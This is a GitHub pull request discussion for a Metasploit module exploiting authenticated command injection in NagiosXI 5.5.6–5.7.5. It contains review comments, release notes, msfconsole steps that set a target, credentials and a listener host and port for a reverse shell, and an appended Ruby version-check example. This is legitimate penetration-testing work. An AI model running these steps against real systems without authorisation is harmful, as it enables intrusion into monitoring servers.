Add NagiosXI authenticated RCE (CVE-2021-25296, CVE-2021-25297, CVE-2021-25298) exploit module #17494
modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
FWIW the lint failure appears to be unrelated, the error is about a file read issue and it can't be rerun.
@k0pak4 Seems like this was a GitHub cache issue that caused an issue due to a missed cache hit. I reran the checks so that things should now pass.
Thanks @gwillcox-r7! Normally I can rerun failed checks, but maybe I couldn't this time because it's a PR-based check and not a normal branch one 🤷‍♂️ Appreciate the assist!
Yeah, a few of them normal people can't rerun, not sure why that one specifically was blocked, but I know we had some security concerns recently about bots running automatically on code so it may have been updated as part of that set of fixes 🤷
Haven't fully reviewed the check method but left some comments on what needs fixing in the meantime. Once this is fixed up I can take a look over the check code again since the module will likely need some adjustments to fix some of the issues mentioned.
documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
@gwillcox-r7 I addressed all of the PR comments except for testing prior NagiosXI versions. I'll do that today but wanted to push the rest up in the meantime. If older versions hit, I'll update the code & docs to reflect that. The biggest changes are: adding
Thanks @k0pak4 will go through this now and review 👍
Thanks @gwillcox-r7 . Turns out it's actually vulnerable from 5.5.6 to 5.7.5. Before 5.5.8, the ip_address parameter is named address, so I had to re-work some of the check to have authenticate also set the version string since it has the response body available. Thanks for the suggestion to check older versions! I'll send in update requests for the CVEs to reflect that. |
Awesome, glad to hear you were able to get this working with more versions! 😄 |
@k0pak4 Looks like most comments were resolved. Still have an outstanding concern re the
@gwillcox-r7 I addressed all the requested changes I think. I tested the module again as well after all the changes. The documentation should be more thorough on the installs, and the check/authenticate should give more detailed statuses and error messages by propagating the ones returned from nagios_xi_login. I also added the requested checks for nil values, etc. so it should be more resilient.
A few comments from reviewing the PR comments I left.
Alright, I think this should be ready for testing, just going over the 4 commits you made to see if there is anything I might have missed, and then will set up a target and test the module against it. Thanks for all the effort you put into this, at over 100 comments I know this is growing a bit long in the tooth but should get this landed soon 👍
I think the module is in a much better place now, I appreciate the thorough and detailed reviews. I checked the other authenticated NagiosXI modules and they could take advantage of some of the suggestions and updates made to this module, so I opened an issue for it (#17606). Given that a lot of the code could be reused during fixing, and that NagiosXI is fairly easy to install, even older versions, it's probably a good candidate to be labeled newbie-friendly.
Thanks, added the newbie-friendly and easy tags so it should be easier for those new to Metasploit to work on this 👍
Fixed a few issues I noticed in the docs review, namely some incorrect CVE numbers due to me switching some of the numbers around, and an update to accommodate the 5.5.7 point on the parameter name changing. Still need to add a scenario for 5.5.6 so we have our range of testing to claim we cover the versions we claim to target; atm we just have 5.7.5 as tested in the documentation.
Good point. I have 5.5.6 installed currently so just added a scenario for it, specifically with CVE-2021-25297 since it uses a different parameter in that version, so it is a better representative example.
Thanks for the example addition @k0pak4!
Some minor changes left I noticed. I'll try to fix these up where I can though, but this should be the last of it for real this time.
Commits:
Add initial module
Fix CVE format Add Documentation
… and fix a bug in the code
Force-pushed from 90785d5 to 52fa2e5
This should be good to land once tests pass. I addressed the updates from above in the last commit then squashed things down to remove all the references to fixes. Tried to keep the commit messages for those fixes that were important and well described. Thanks for PRing this @k0pak4 and appreciate your help on all this!
Thanks for the thorough PR, I know it was a lot of changes so I appreciate it 🎉 Thanks for tidying up the commit history too, it was certainly getting messy.
Release Notes
A new authenticated RCE module for NagiosXI has been added which exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298 to get a shell as the
This PR adds an exploit module for three CVEs (CVE-2021-25296, CVE-2021-25297, CVE-2021-25298) that perform command injection against NagiosXI 5.7.5. It utilizes the Nagios login mixin for target verification and authentication.
Verification
msfconsole
use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
set RHOSTS TARGET_IP
set RPORT 443
set SSL true
set USERNAME USER
set PASSWORD PASSWORD
set TARGET_URL_PARAM plugin_output_len
set LHOST YOUR_IP
set LPORT YOUR_LISTENING_PORT
run
Vulnerable Software
The easiest way to test is against the official OVA (https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova), but installing it manually on Linux is also an option.
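The thread above settles two facts the module's check has to handle: the vulnerable range is 5.5.6 through 5.7.5, and the host address parameter is named address before 5.5.8 and ip_address from 5.5.8 on, which is why authenticate ends up carrying the version string over to the check. The following Ruby is an added example written for this page; it is not code from the PR or from the Metasploit module. It shows a version-aware check that picks the right parameter name for a given target, comparing with Gem::Version (Metasploit's Rex::Version is built on it). The HTML snippet format used to extract the version, the constructed sample bodies, and the helper names are assumptions and not taken from the module.

```ruby
# Added example, not the Metasploit module's code. Facts from the PR thread:
# vulnerable range 5.5.6..5.7.5; the "ip_address" parameter of 5.5.8+ is
# named "address" in earlier versions. Assumptions (not on the page): the
# page format the version is scraped from, the helper names, and Gem::Version
# as the comparison type (Rex::Version in Metasploit is a Gem::Version).
require 'rubygems'

VULN_MIN        = Gem::Version.new('5.5.6')
VULN_MAX        = Gem::Version.new('5.7.5')
PARAM_RENAME_AT = Gem::Version.new('5.5.8')

# Pull "Nagios XI <x.y.z>" out of a response body. The footer markup below is
# a constructed assumption; a real module matches whatever the login or
# dashboard page of the target actually returns.
def extract_xi_version(body)
  m = body.match(/Nagios XI\s+(\d+\.\d+\.\d+)/)
  m && Gem::Version.new(m[1])
end

# Range check in the shape a module's `check` would use. Returns :unknown
# when no version could be recovered, so the caller can fall back to a
# CheckCode::Unknown rather than a false Safe.
def xi_check(version)
  return :unknown if version.nil?
  return :vulnerable if version >= VULN_MIN && version <= VULN_MAX
  :safe
end

# Select the request parameter name for the host address field:
# "address" before 5.5.8, "ip_address" from 5.5.8 onward.
def address_param_for(version)
  version < PARAM_RENAME_AT ? 'address' : 'ip_address'
end

# Constructed sample bodies standing in for real HTTP responses.
SAMPLE_BODIES = {
  'old'     => '<div class="footer">Nagios XI 5.5.6</div>',
  'renamed' => '<div class="footer">Nagios XI 5.5.8</div>',
  'latest'  => '<div class="footer">Nagios XI 5.7.5</div>',
  'fixed'   => '<div class="footer">Nagios XI 5.8.0</div>',
  'none'    => '<html><body>Login</body></html>'
}.freeze

# One call that does what authenticate + check do together in the thread's
# description: recover the version, classify it, and record which parameter
# name the exploit request must use.
def classify(body)
  v = extract_xi_version(body)
  {
    version: v && v.to_s,
    status: xi_check(v),
    address_param: v ? address_param_for(v) : nil
  }
end

if __FILE__ == $PROGRAM_NAME
  SAMPLE_BODIES.each { |label, body| puts "#{label}: #{classify(body)}" }
end
```

Versions outside the tested range are reported as :safe here purely for illustration; a shipping module would more likely report Detected for an unrecognised but authenticated NagiosXI install, since the thread only establishes that 5.5.6 through 5.7.5 were confirmed vulnerable, not that everything else is fixed.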